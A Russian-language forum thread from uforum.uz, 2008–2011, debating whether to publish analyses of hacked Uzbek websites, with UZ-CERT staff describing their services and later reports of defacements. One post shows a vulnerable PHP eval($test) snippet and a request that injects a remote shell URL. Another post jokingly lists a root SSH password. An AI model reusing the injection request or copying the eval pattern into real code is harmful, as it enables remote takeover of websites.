uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   Инциденты (https://uforum.uz/forumdisplay.php?f=133)
-   -   Взломы в зоне .UZ (https://uforum.uz/showthread.php?t=5397)

elf 12.06.2008 11:23

Взломы в зоне .UZ
 
Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.

Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз...

Ivan Lodyanoy 12.06.2008 11:32

Цитата:

Сообщение от elf (Сообщение 109652)
Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.

Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз...

Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

elf 12.06.2008 11:51

Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Ivan Lodyanoy 12.06.2008 11:57

Цитата:

Сообщение от elf (Сообщение 109669)
Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Есть статьи, новости, бактрек на cert.uz. Там можно читать. А анализы выкладывать в паблик вам никто не даст. Это потенциальная очередная угроза для сайт, а так же его престиж, рейтинг. Администраторы сайтов уведомляются о том, что у них есть "дыры", исправляют.

Dmitry Paleev 12.06.2008 15:46

Цитата:

Сообщение от elf (Сообщение 109669)
Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Анализом взломов, угроз и уязвимостей ежедневно занимается соответствующая группа Службы UZ-CERT. В случае обращения в Службу UZ-CERT по вопросам компьютерных инцидентов проводится работа по выявлению источника угрозы, методов несанкционированного доступа и проникновения в систему, выявляются деструктивные действия произведенные злоумышленниками, анализируются системные журналы и события и т.д. Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне. Отчет об анализе с рекомендациями получает непосредственнно владелец ресурса.

Igor Khan 12.06.2008 16:56

Цитата:

Сообщение от Dmitry Paleev (Сообщение 109792)
Анализом взломов, угроз и уязвимостей ежедневно занимается соответствующая группа Службы UZ-CERT. В случае обращения в Службу UZ-CERT по вопросам компьютерных инцидентов проводится работа по выявлению источника угрозы, методов несанкционированного доступа и проникновения в систему, выявляются деструктивные действия произведенные злоумышленниками, анализируются системные журналы и события и т.д. Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне. Отчет об анализе с рекомендациями получает непосредственнно владелец ресурса.

На каких условиях вы осуществляете эту работу? У нас возникла необходимость в выявлении уязвимостей eduportal.uz, а также предотвращении попыток несанкционированного доступа и проникновения в систему.

Ruslan Aliev 12.06.2008 17:03

Цитата:

Сообщение от elf (Сообщение 109669)
Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?

Timur Naimov 12.06.2008 17:09

Цитата:

Сообщение от elf (Сообщение 109652)
Народ, разместите сюда информации о взломанных сайтах с анализами взлома.

Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...

ePifani 05.08.2008 23:09

не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...ну у них еще дефейс ленты есть! их владельсов и пользователей не трогают у нас тоже так? или нельзя?

Evgeniy Sklyarevskiy 06.08.2008 13:46

Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами".

Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

И в большинстве случаев атакующие оставляют запись типа - "Админ, обрати внимание на порт такой-то или дыру там-то" - то есть, подсказывают, где и что не закрыто. Благородно так...
Писал об этом большую статью - есть на сайте журнала.

Eldar Ishimbaev 06.08.2008 13:48

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126555)
Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

Вы ошибаетесь.

Azamat Atajanov 06.08.2008 14:37

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126555)
если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

Как-то 60 сайтов дефейснули ребята, даже не знавшие, где находится Узбекистан.

Evgeniy Sklyarevskiy 06.08.2008 14:44

Цитата:

Сообщение от Eldar Ishimbaev (Сообщение 126557)
Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126555)
Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

Вы ошибаетесь.

Это был один из вариантов развития ситуации. Имевших место быть ;-)

Eldar Ishimbaev 06.08.2008 14:53

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126591)
Это был один из вариантов развития ситуации. Имевших место быть ;-)

Что? То, что Вы ошибаетесь, это один из вариантов развития ситуации? Имевшего место быть?

Rustam Kh 27.10.2008 17:50

Цитата:

Сообщение от ePifani (Сообщение 126377)
не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...

ИМХО
Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Вот электронный журнал по информационной безопасности http://www.security.uz/

CTAPu4OK 21.11.2008 21:09

Цитата:

Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Бред... на счет вареза вы обсалютно правы.. но на счет хакинга нет...
Как учится людям IT, если не иметь понятия что такое хакинг ?
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ?
программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Если я не прав, поправьте меня...

Rustam Kh 30.11.2008 23:46

Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
Цитата:

Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Бред... на счет вареза вы обсалютно правы.. но на счет хакинга нет...
Как учится людям IT, если не иметь понятия что такое хакинг ?
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ?
программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Если я не прав, поправьте меня...

Вы ошибаетесь. ©Eldar Ishimbaev
И вообще, что вы подразумеваете под словом "хак"?
У нас наверное совсем разные понятия.
Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
программисты.. которые не знают все уловки и не могут мыслить как хакеры.

Фильмы про хакеров меньше смотреть надо
Не буду с Вами спорить, судя по вашему сообщению толку нет.


Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
это не только плохо и противозаконно

Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
в сети Уз должен быть хоть один сайт про Хакинг


CTAPu4OK 21.01.2009 20:08

Цитата:

Сообщение от Rustam Kh (Сообщение 157828)
Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
Цитата:

Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Бред... на счет вареза вы обсалютно правы.. но на счет хакинга нет...
Как учится людям IT, если не иметь понятия что такое хакинг ?
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ?
программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Если я не прав, поправьте меня...

Вы ошибаетесь. ©Eldar Ishimbaev
И вообще, что вы подразумеваете под словом "хак"?
У нас наверное совсем разные понятия.

Фильмы про хакеров меньше смотреть надо
Не буду с Вами спорить, судя по вашему сообщению толку нет.


Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
это не только плохо и противозаконно

Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
в сети Уз должен быть хоть один сайт про Хакинг


Что я подразумиваю под словом Хак ? вы подумайте, может поймете, прочитайте еще раз мое сообщение...

Цитата:

Не буду с Вами спорить, судя по вашему сообщению толку нет.
Да что вы ? а что в моем сообщении не так ? я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
И если можно объясните что вы имели в виду под предложением
судя по вашему сообщению


А на счет фильмов про хакеров... может кто то и смотрит в надежде чему либо научится... я не из их числа xD

Надеюсь уязвимых ошибок в словах не оставил... =)))))

Dolphin 22.01.2009 11:11

Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ? программисты.. которые не знают все уловки и не могут мыслить как хакеры.

Вообще-то подавляющее большинство сайтов в зоне uz работают на разнообразных CMS, вордпрессах, джумлах и подобных вещах - а эксплоиты, юзающие их ошибки - не редкость. Как-раз таки простенький самописный движок сложней поломать - непопулярен его исходный код, и в нем нет лишних функций. У многих в админке хостера вообще пароли простые.
Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг...

Зачем? Он не сразу догонит ресурсы по секьюрити в зоне ru и тем более, в доткоме, соответственно, загнется. Было дело.
Цитата:

Сообщение от CTAPu4OK (Сообщение 174003)
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...

Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

Albert Sabirov 24.01.2009 16:25

Я думаю тема правильная. Обсуждать и исправлять на будущее это лучше, чем потом сопли жувать)

CTAPu4OK 18.06.2009 23:11

Цитата:

Сообщение от Timur Rasulov (Сообщение 174110)
Цитата:

Сообщение от CTAPu4OK (Сообщение 174003)
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...

Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал
PHP код:

<?
eval($test);
?>

Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...

Dolphin 19.06.2009 10:52

Цитата:

Сообщение от CTAPu4OK (Сообщение 232406)
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...

Цитата:

Сообщение от Timur Rasulov (Сообщение 174110)
Вначале нужно понять конструкцию и логику вебсервера


CTAPu4OK 20.06.2009 05:40

Цитата:

Сообщение от Timur Rasulov (Сообщение 232503)
Цитата:

Сообщение от CTAPu4OK (Сообщение 232406)
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...

Цитата:

Сообщение от Timur Rasulov (Сообщение 174110)
Вначале нужно понять конструкцию и логику вебсервера


И что вам это даст ?
У веб серверов логики не какой нету, это искусственный разум =)
Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще.

dmitry.uz 22.06.2009 14:54

Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать :)
Сломать могут по разному - нет универсальной защиты.
Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают.
Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах.

Nestik 11.09.2009 11:52

Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.

Alexandr Pavlenko 11.09.2009 13:45

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126555)
Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?

Оффтоп:
ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можна

Цитата:

Сообщение от Timur Naimov (Сообщение 110075)
Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...

Оффтоп:
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя


Цитата:

Сообщение от Dmitry Paleev (Сообщение 109792)
Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне.

я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Dmitry Paleev 11.09.2009 14:10

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269583)
я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.

insider 11.09.2009 15:16

Цитата:

Сообщение от Dmitry Paleev (Сообщение 269597)
Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?

Оффтоп:

это типа на сайте будет раздел такого содержания:

Руководство для хакера...
как взломать uzinfocom ?
для этого надо подключится к серверу через ssh (putty)
в ввести в login: root , а password: 86hhyqiiy564g , после авторизации
сервер полностью ваш ....
:biggrin:

Alexandr Pavlenko 11.09.2009 16:03

Цитата:

Сообщение от Dmitry Paleev (Сообщение 269597)
Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.

С деятельностью Службы UZ-CERT ознакомился...спасибо.
Цитата:

...консультативную и техническую поддержку пользователям в предотвращении угроз компьютерной безопасности.
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??


Цитата:

Сообщение от CTAPu4OK (Сообщение 232823)
У веб серверов логики не какой нету, это искусственный разум =)

Оффтоп:
Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича

Timur Naimov 11.09.2009 16:24

Оффтоп:
Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269583)
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя

Кто Вам дал право переходить со мной на ты?
За горло брать будете лично Вы?
Могилку копать тоже?

Я вообще не понял к чему это все было сказано?

Alexandr Pavlenko 11.09.2009 16:43

Цитата:

Сообщение от Timur Naimov (Сообщение 269654)
Оффтоп:
Цитата:
Сообщение от Alexandr Pavlenko Посмотреть сообщение
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя
Кто Вам дал право переходить со мной на ты?
За горло брать будете лично Вы?
Могилку копать тоже?

Я вообще не понял к чему это все было сказано?

Оффтоп:
не бейте меня, обращение не к вам а риторическое

а сказано это былы к тому, что суть диалога вашего - просто напросто набор слов из головы, и если ВЫ действительно считаете,
что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог начитавшись этой ветки, то я и говорю, что это чушь!

Оффтоп:
или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет

Timur Naimov 11.09.2009 16:55

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269673)
что суть диалога вашего - просто напросто набор слов из головы

А суть Вашего диалога другая, Вы слова не из головы берете? :) Из другого места какого-то?

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269673)
и если ВЫ действительно считаете,
что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог, то я и говорю, что это чушь!

Причем тут "15-летние пацаны" и "кулхацкеры". Моя фраза была ответом на просьбу "Народ, разместите сюда информации о взломанных сайтах с анализами взлома".

Я не знаю кто такие "кулхацкеры", есть ли они у нас в стране и каков их возростной состав. Тем более я не знаю, какие разговоры они могут вести.

Alexandr Pavlenko 11.09.2009 16:58

Цитата:

Сообщение от Timur Naimov (Сообщение 269675)
А суть Вашего диалога другая, Вы слова не из головы берете? Из другого места какого-то?

Оффтоп:
заценил =)

ну тогда суть этой фразы в студию, потому как я значица неправильно ее истолковал..

Timur Naimov 11.09.2009 17:00

Оффтоп:
Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269673)
или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет

Александр, Вы ответили на мой пост в достаточно грубой форме. На чей счет я должен был это принять?
Теперь Вы сравниваете меня с "15-летним кулхацкером", т.к. по Вашему мнению именно им свойственны такие диалоги.
У Вас проблемы, Вы хотите об этом поговорить? Я Вам чем-то не нравлюсь? Есть раздел "К барьеру".

Alexandr Pavlenko 11.09.2009 17:12

Оффтоп:

Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
Александр, Вы ответили на мой пост в достаточно грубой форме.

грубую форму поста каждый постер определяет для себя в отдельности, если по вашему это грубо, чтож вы вправе так считать..


Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
Теперь Вы сравниваете меня с "15-летним кулхацкером"

я не заметил у себя в постах "Timur Naimov"=="15-летнй кулхацкер"

Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
У Вас проблемы, Вы хотите об этом поговорить?

кажется вы начинаете грубить....(, между прочим некрасиво...

Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
Я Вам чем-то не нравлюсь?

Вы мне абсолютно безразличны...

Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
Есть раздел "К барьеру".

создавайте тему, если я Вас так задел, приду


Dmitry Paleev 11.09.2009 17:13

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269643)
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??

Если Вас интересует что-то конкретное, либо Вы хотите получить совет или рекомендации по используемому Вами ПО, можете обращаться посредством электронной почты, создав тему в ветке UZ-CERT на данном форуме, или позвонив по телефонам. Все контакты есть у нас на сайте. По мере возможности постараемся помочь. Что касается работающих ресурсов в зоне .UZ, то как раз для владельцев таких ресурсов нами была открыта программа UZ-CERTified. Зарегистрироваться в данной программе может владелец ресурсов в доменной зоне UZ. После чего его ресурс будет проверен на наличие угроз ИБ, а также будет доступен ряд других сервисов. Подробнее о программе UZ-CERTified можете узнать здесь. Помимо этого, сотрудниками Службы UZ-CERT периодически проводится мониторинг ресурсов в доменной зоне UZ на наличие угроз ИБ и вредоносных ссылок. Подробнее в этой теме.

Timur Naimov 11.09.2009 17:31

Оффтоп:
Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269683)
создавайте тему, если я Вас так задел, приду

Нет, "так" не задели. Меня вообще сложно вывести из себя :) Порешим на полной нашей безразличности друг к другу.

beksam 29.06.2011 15:53

Дефейс joomla.uz
 
Дефейс joomla.uz
Собственно сабж, уже не первый месяц так стоит как я понял.

Код:

HACKED BY:N0FAC3

N0FAC3 - DSRsysGR - H0AX TR0JAN - ALBDRAG0N

UNITED STATES OF ALBANIA

nofac3@hotmail.com

Republic of Kosovo Hackers


Greetz:Phantom a.k.a empror & Flaming BoOt3r

Вот по теме:
JOOMLA.UZ HACKED BY E404 a.k.a N0FAC3
http://www.youtube.com/watch?v=UW0A1rY_qY8
Видео загружено 06.05.2011

azim 29.06.2011 16:05

Наверняка нашли дыру в устаревшей версии движка. Обновляться вовремя надо...

Aziz Madetov 29.06.2011 16:52

http://womenfootball.uz/ тоже. Руки им поотрывать!


Текущее время: 16:00. Часовой пояс GMT +5.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод: zCarot
OOO «Единый интегратор UZINFOCOM»